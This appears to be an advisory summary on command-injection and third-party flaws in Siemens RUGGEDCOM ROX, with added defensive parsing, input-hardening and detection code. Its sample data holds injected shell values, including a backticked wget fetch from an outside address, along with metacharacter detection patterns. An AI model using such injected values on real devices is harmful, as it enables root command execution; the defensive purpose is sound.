Full Report
Devices based on RUGGEDCOM ROX before V2.16 contain multiple high severity vulnerabilities, including the third-party vulnerabilities CVE-2022-24903, CVE-2022-2068, CVE-2021-22946, CVE-2022-22576, CVE-2022-27781, CVE-2022-27782, CVE-2022-32207 and CVE-2022-1292. Siemens has released updates for the affected products and recommends updating to the latest versions.
Analysis Summary
# Vulnerability: Multiple High Severity Flaws in RUGGEDCOM ROX
## CVE Details
The advisory covers several high-severity vulnerabilities. Key identifiers include:
| CVE ID | CVSS Score | CWE | Type |
| :--- | :--- | :--- | :--- |
| **CVE-2022-1292** | 9.8 (Critical) | CWE-78 | OS Command Injection (OpenSSL) |
| **CVE-2022-2068** | 9.8 (Critical) | CWE-78 | OS Command Injection (OpenSSL) |
| **CVE-2023-36754**| 9.1 (Critical) | CWE-77 | Command Injection (SCEP URL) |
| **CVE-2023-36755**| 9.1 (Critical) | CWE-77 | Command Injection (SCEP CA Name) |
| **CVE-2022-22576**| 8.1 (High) | CWE-287 | Improper Authentication (curl) |
| **CVE-2022-24903**| 8.1 (High) | CWE-120 | Buffer Overflow (rsyslog) |
| **CVE-2021-22946**| 7.5 (High) | CWE-319 | Cleartext Transmission (curl) |
| **CVE-2022-27781**| 7.5 (High) | CWE-400 | Resource Consumption (curl) |
## Affected Systems
* **Products:** RUGGEDCOM ROX-based devices (including MX5000, RX1400, RX1500 series, RX5000 series).
* **Versions:** All versions prior to **V2.16.0**. The range 7.20.0 through 7.78.0 cited for certain components is a curl library version range (the curl releases affected by CVE-2021-22946), not a ROX firmware version.
* **Configurations:** Systems using SCEP (Simple Certificate Enrollment Protocol), web-based management interfaces, or rsyslog with octet-counted framing enabled.
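The rsyslog item in the configuration list above refers to RFC 6587 octet-counted framing, where each TCP frame is `<decimal length> SP <message>`. The added parser below (an illustration written for this page, not rsyslog's code) shows the two bounds a TCP syslog receiver has to enforce before it copies anything into its buffer: a cap on the length prefix itself and a cap on the declared frame size. The limits `MAX_DIGITS` and `MAX_FRAME` are assumed values, and the sample byte stream is constructed.

```python
"""RFC 6587 octet-counted syslog framing as a TCP receiver parses it.

Added illustration, not rsyslog's code. MAX_DIGITS and MAX_FRAME are
assumed limits chosen for the example, not rsyslog's own constants.
"""

MAX_DIGITS = 10        # assumed: longest length prefix we will accept
MAX_FRAME = 64 * 1024  # assumed: largest message the receiver will buffer


class FramingError(ValueError):
    """Raised for a frame the receiver must drop rather than buffer."""


def parse_octet_counted(stream: bytes):
    """Return (frames, remainder) for a byte stream of octet-counted frames.

    Both checks happen before any message bytes are copied: the prefix is
    bounded while it is being read, and the declared length is compared
    with MAX_FRAME before the slice is taken. Incomplete trailing data is
    returned as the remainder so the caller can wait for more bytes.
    """
    frames = []
    pos = 0
    while pos < len(stream):
        # 1. read the decimal length prefix, never more than MAX_DIGITS digits
        end = pos
        while end < len(stream) and stream[end:end + 1].isdigit():
            end += 1
            if end - pos > MAX_DIGITS:
                raise FramingError("length prefix too long")
        if end == pos:
            raise FramingError("frame does not start with a length prefix")
        if end == len(stream):
            break  # prefix cut off mid-way: keep it as remainder
        if stream[end:end + 1] != b" ":
            raise FramingError("length prefix not followed by SP")
        length = int(stream[pos:end])
        # 2. bound the declared size before touching the receive buffer
        if length > MAX_FRAME:
            raise FramingError(f"declared frame size {length} exceeds {MAX_FRAME}")
        start = end + 1
        if start + length > len(stream):
            break  # frame body not fully received yet
        frames.append(stream[start:start + length])
        pos = start + length
    return frames, stream[pos:]


# Constructed sample: two complete frames followed by a partial third one.
SAMPLE_STREAM = b"9 <13>hello" + b"18 <14>second message" + b"5 <1"

if __name__ == "__main__":
    frames, rest = parse_octet_counted(SAMPLE_STREAM)
    print(frames, rest)
```

A receiver that reads the prefix into a fixed buffer without the first bound, or allocates on the declared length without the second, is exactly the shape of bug that a remote sender can trigger with a single crafted frame.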
## Vulnerability Description
The advisory addresses two main categories of flaws:
1. **Third-Party Library Vulnerabilities:** Issues in OpenSSL (command injection via the `c_rehash` script), curl (credential reuse across connections and a bypass of the TLS requirement for some protocols) and rsyslog (heap buffer overflow in TCP reception with octet-counted framing). Depending on the CVE, these allow remote code execution, data interception or denial of service.
2. **Native ROX Vulnerabilities:** Missing server-side input sanitization in the RUGGEDCOM ROX web interface. The SCEP server configuration parameters (URL and CA Certificate Name) are not filtered for shell metacharacters, so an authenticated attacker who can edit them can execute arbitrary commands with **root privileges**.
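The ROX web interface is not public, so the added example below is an illustration of the bug class in item 2, not ROX's own code: a SCEP URL and CA name from a web form are pasted into a shell command line (the "before" form), next to a hardened builder that allow-lists both values and hands them to the enrolment tool as an argv list with no shell. The tool path `/usr/bin/scep-client` and its `--url`/`--ca` flags are assumed names for the example.

```python
"""SCEP parameter injection: vulnerable string building beside the hardened form.

Added illustration, not RUGGEDCOM ROX code. SCEP_CLIENT and its flags are
assumed; the real enrolment helper on the device is not documented here.
"""
import re
import shlex
from urllib.parse import urlsplit

SCEP_CLIENT = "/usr/bin/scep-client"  # assumed helper name

# Characters that separate commands, substitute, redirect, quote or glob in sh.
SHELL_META = set(";|&$`<>(){}'\"\\*[]!\n\r")


def build_scep_command_vulnerable(url: str, ca_name: str) -> str:
    """'Before' form: form values are concatenated into a shell string.
    If the caller passes this to a shell (system(), shell=True), every
    metacharacter in url or ca_name is interpreted, as root if the daemon
    runs as root."""
    return f"{SCEP_CLIENT} --url {url} --ca {ca_name}"


def shell_words(cmd: str) -> list:
    """Approximate POSIX shell tokenization of cmd: ';', '|', '&', '<', '>'
    and parentheses become their own tokens, which is how an injected
    command is split off from the intended one."""
    lexer = shlex.shlex(cmd, posix=True, punctuation_chars=True)
    lexer.whitespace_split = True
    return list(lexer)


def validate_scep_url(url: str) -> str:
    """Allow only http(s) URLs with a host and no shell metacharacters."""
    parts = urlsplit(url)
    if parts.scheme not in ("http", "https") or not parts.hostname:
        raise ValueError("SCEP URL must be http(s) with a host")
    if any(ch in SHELL_META or ch.isspace() for ch in url):
        raise ValueError("SCEP URL contains shell metacharacters")
    return url


def validate_ca_name(ca_name: str) -> str:
    """Allow-list: a short token that cannot start with '-', so it can never
    be read as an extra option by the helper (argument injection)."""
    if not re.fullmatch(r"[A-Za-z0-9][A-Za-z0-9._-]{0,63}", ca_name):
        raise ValueError("CA name must match [A-Za-z0-9][A-Za-z0-9._-]{0,63}")
    return ca_name


def build_scep_command_safe(url: str, ca_name: str) -> list:
    """'After' form: validated values in an argv list for
    subprocess.run(argv) with shell=False. No character in either value can
    split the command line, because there is no shell to interpret it."""
    return [SCEP_CLIENT, "--url", validate_scep_url(url),
            "--ca", validate_ca_name(ca_name)]


if __name__ == "__main__":
    # Constructed attacker input: a URL that closes the command and runs id.
    hostile = "http://ca.example/scep;id"
    print(shell_words(build_scep_command_vulnerable(hostile, "lab-ca")))
    try:
        build_scep_command_safe(hostile, "lab-ca")
    except ValueError as exc:
        print("rejected:", exc)
```

The two changes do different jobs: the allow-list stops bad values at the boundary and gives the operator a clear error, and the argv list means that even a value the allow-list missed cannot become a second command. Either alone is weaker than both together.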
## Exploitation
* **Status:** Proof-of-concept exploit code exists (the CVSS temporal vectors for several of the CVEs carry `E:P`, Exploit Code Maturity: Proof-of-Concept).
* **Complexity:** Varies by CVE. The two SCEP injections are Low complexity (AC:L) but require an authenticated user with the privilege to edit SCEP settings (PR:H).
* **Attack Vector:** Network.
## Impact
* **Confidentiality:** High (Full access to system data and encrypted traffic interception).
* **Integrity:** High (Ability to modify system configurations or execute arbitrary code).
* **Availability:** High (Potential for system crashes or permanent loss of control via root access).
## Remediation
### Patches
Siemens recommends upgrading all RUGGEDCOM ROX-based devices to **V2.16.0** or later.
* Download via Siemens Industry Online Support: hxxps://support.industry.siemens.com/
### Workarounds
* **Authentication & Access:** Limit access to the web interface to trusted administrative networks only.
* **Feature Management:** Disable SCEP features if not required by the environment.
* **Network Segmentation:** Protect the management port (MGT) behind a firewall and ensure it is not reachable from the public internet.
## Detection
* **Indicators of Compromise:** Alert on shell processes (`sh`, `bash`, `busybox`) spawned by the web-server or management daemon, and on commands run as root that were not initiated from an administrative session. Audit configuration changes to the SCEP URL and CA Certificate Name for shell metacharacters (`;`, `|`, `&`, `$(`, backticks, redirections).
* **Scanning:** Inventory RUGGEDCOM ROX firmware versions and flag every device below V2.16.0; vulnerability scanners can do this by banner or version check.
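The two indicators above, turned into detection logic and run over constructed sample records. This is an added example, not a detection shipped with ROX: the audit-line format, the configuration paths `/security/scep/url` and `/security/scep/ca-name`, the process-event fields and the web server process name `webui` are all assumed for the example, so map them to the real field names before using it.

```python
"""Detection for the SCEP injection indicators, over constructed sample data.

Added example. The log line format, the SCEP config paths, the process
event schema and the process name 'webui' are assumptions, not ROX's own.
"""
import re

# Assumed configuration paths whose values reach a shell on a vulnerable build.
SCEP_PATHS = {"/security/scep/url", "/security/scep/ca-name"}
# Metacharacters that have no business in a SCEP URL or a CA name.
SHELL_META_RE = re.compile(r"[;|&`$<>(){}\n]")
SHELLS = {"sh", "bash", "dash", "ash", "busybox"}
WEB_SERVER = "webui"  # assumed process name of the management web server

# Assumed audit format: <ts> config user=<user> path=<path> value="<value>"
AUDIT_RE = re.compile(
    r'^(?P<ts>\S+) config user=(?P<user>\S+) path=(?P<path>\S+) value="(?P<value>.*)"$'
)


def scan_scep_audit(lines):
    """Return (ts, user, path, value) for SCEP parameter changes whose value
    contains shell metacharacters. Other config paths are ignored so an odd
    but legitimate value elsewhere does not raise an alert."""
    hits = []
    for line in lines:
        m = AUDIT_RE.match(line.rstrip("\n"))
        if not m or m["path"] not in SCEP_PATHS:
            continue
        if SHELL_META_RE.search(m["value"]):
            hits.append((m["ts"], m["user"], m["path"], m["value"]))
    return hits


def shells_spawned_by_webserver(events):
    """events: process-creation records with pid, ppid and comm (assumed
    schema). Return pids of shells whose parent is the web server process,
    which is the execution step of the injection."""
    comm_by_pid = {e["pid"]: e["comm"] for e in events}
    return [e["pid"] for e in events
            if e["comm"] in SHELLS and comm_by_pid.get(e["ppid"]) == WEB_SERVER]


# Constructed sample data (not captured from a device).
SAMPLE_AUDIT = [
    '2024-05-01T10:00:00Z config user=admin path=/security/scep/url value="https://ca.example/scep"',
    '2024-05-01T10:05:12Z config user=admin path=/security/scep/url value="https://ca.example/scep;id>/tmp/o"',
    '2024-05-01T10:06:00Z config user=admin path=/security/scep/ca-name value="lab-ca`wget 198.51.100.7/x`"',
    '2024-05-01T10:07:00Z config user=admin path=/system/hostname value="rtr-1"',
]
SAMPLE_EVENTS = [
    {"pid": 100, "ppid": 1, "comm": "webui"},
    {"pid": 101, "ppid": 100, "comm": "scep-client"},  # expected child
    {"pid": 102, "ppid": 100, "comm": "sh"},           # injection executing
    {"pid": 103, "ppid": 102, "comm": "wget"},
    {"pid": 104, "ppid": 1, "comm": "sh"},             # unrelated shell
]

if __name__ == "__main__":
    for hit in scan_scep_audit(SAMPLE_AUDIT):
        print("suspicious SCEP change:", hit)
    print("shells under web server:", shells_spawned_by_webserver(SAMPLE_EVENTS))
```

On a patched build the first check still has value: a metacharacter in a SCEP field is either a misconfiguration or someone probing for the old bug, and both are worth a ticket.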
## References
* Siemens Security Advisory SSA-146325: hxxps://cert-portal.siemens.com/productcert/pdf/ssa-146325.pdf
* Siemens ProductCERT: hxxps://www.siemens.com/cert/advisories